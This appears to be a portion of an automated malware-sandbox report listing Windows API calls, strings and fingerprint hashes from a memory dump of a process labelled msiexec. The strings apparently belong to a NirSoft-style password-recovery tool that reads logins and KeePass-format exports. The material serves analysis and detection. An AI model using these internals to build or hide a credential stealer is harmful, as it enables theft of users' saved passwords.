                                                                                        • _wcsicmp.MSVCRT ref: 004081C3
                                                                                        • memset.MSVCRT ref: 004081E4
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                          • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                          • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                        • String ID: logins$null
                                                                                        • API String ID: 2148543256-2163367763
                                                                                        • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                        • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                        • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                        • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                        APIs
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        • memset.MSVCRT ref: 004085CF
                                                                                        • memset.MSVCRT ref: 004085F1
                                                                                        • memset.MSVCRT ref: 00408606
                                                                                        • strcmp.MSVCRT ref: 00408645
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                        • memset.MSVCRT ref: 0040870E
                                                                                        • strcmp.MSVCRT ref: 0040876B
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                        • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                        • String ID: ---
                                                                                        • API String ID: 3437578500-2854292027
                                                                                        • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                        • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041087D
                                                                                        • memset.MSVCRT ref: 00410892
                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                        • DeleteObject.GDI32(?), ref: 004109D0
                                                                                        • DeleteObject.GDI32(?), ref: 004109D6
                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1010922700-0
                                                                                        • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                        • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                        APIs
                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                        • malloc.MSVCRT ref: 004186B7
                                                                                        • free.MSVCRT ref: 004186C7
                                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                        • free.MSVCRT ref: 004186E0
                                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                        • malloc.MSVCRT ref: 004186FE
                                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                        • free.MSVCRT ref: 00418716
                                                                                        • free.MSVCRT ref: 0041872A
                                                                                        • free.MSVCRT ref: 00418749
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$FullNamePath$malloc$Version
                                                                                        • String ID: |A
                                                                                        • API String ID: 3356672799-1717621600
                                                                                        • Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                        • Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                        • API String ID: 2081463915-1959339147
                                                                                        • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                        • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                        • API String ID: 2012295524-70141382
                                                                                        • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                        • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                        • API String ID: 667068680-3953557276
                                                                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf
                                                                                        • String ID: %%0.%df
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                                        • GetParent.USER32(?), ref: 00406136
                                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                        • String ID: A
                                                                                        APIs
                                                                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                        • memset.MSVCRT ref: 0040DA23
                                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                        • String ID: caption
                                                                                        APIs
                                                                                        Strings
                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                        APIs
                                                                                        • wcschr.MSVCRT ref: 00413972
                                                                                        • wcscpy.MSVCRT ref: 00413982
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                        • wcscpy.MSVCRT ref: 004139D1
                                                                                        • wcscat.MSVCRT ref: 004139DC
                                                                                        • memset.MSVCRT ref: 004139B8
                                                                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                        • memset.MSVCRT ref: 00413A00
                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                        • wcscat.MSVCRT ref: 00413A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                        • String ID: \systemroot
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: wcscpy
                                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                        APIs
                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                        • strchr.MSVCRT ref: 0040C140
                                                                                        • strchr.MSVCRT ref: 0040C151
                                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                                        • memset.MSVCRT ref: 0040C17A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                        • String ID: 4$h
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                        • String ID: 0$6
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004082EF
                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                        • memset.MSVCRT ref: 00408362
                                                                                        • memset.MSVCRT ref: 00408377
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 290601579-0
                                                                                        APIs
                                                                                        • memchr.MSVCRT ref: 00444EBF
                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                        • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                        • memset.MSVCRT ref: 0044505E
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy$memchrmemset
                                                                                        • String ID: PD$PD
                                                                                        • API String ID: 1581201632-2312785699
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                        • GetDC.USER32(00000000), ref: 00409F6E
                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                        • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                        • GetParent.USER32(?), ref: 00409FA5
                                                                                        • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                        Similarity
                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2163313125-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: free$wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 3592753638-3916222277
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040A47B
                                                                                        • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                        • wcslen.MSVCRT ref: 0040A4BA
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                        • wcslen.MSVCRT ref: 0040A4E0
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                        • String ID: %s (%s)$YV@
                                                                                        • API String ID: 3979103747-598926743
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                        • wcslen.MSVCRT ref: 0040A6B1
                                                                                        • wcscpy.MSVCRT ref: 0040A6C1
                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                        • wcscpy.MSVCRT ref: 0040A6DB
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                        • API String ID: 2767993716-572158859
                                                                                        APIs
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        • wcscpy.MSVCRT ref: 0040DAFB
                                                                                        • wcscpy.MSVCRT ref: 0040DB0B
                                                                                        • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                          • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                        • API String ID: 3176057301-2039793938
                                                                                        APIs
                                                                                        Strings
                                                                                        • unable to open database: %s, xrefs: 0042F84E
                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                        • too many attached databases - max %d, xrefs: 0042F64D
                                                                                        • out of memory, xrefs: 0042F865
                                                                                        • database %s is already in use, xrefs: 0042F6C5
                                                                                        • database is already attached, xrefs: 0042F721
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
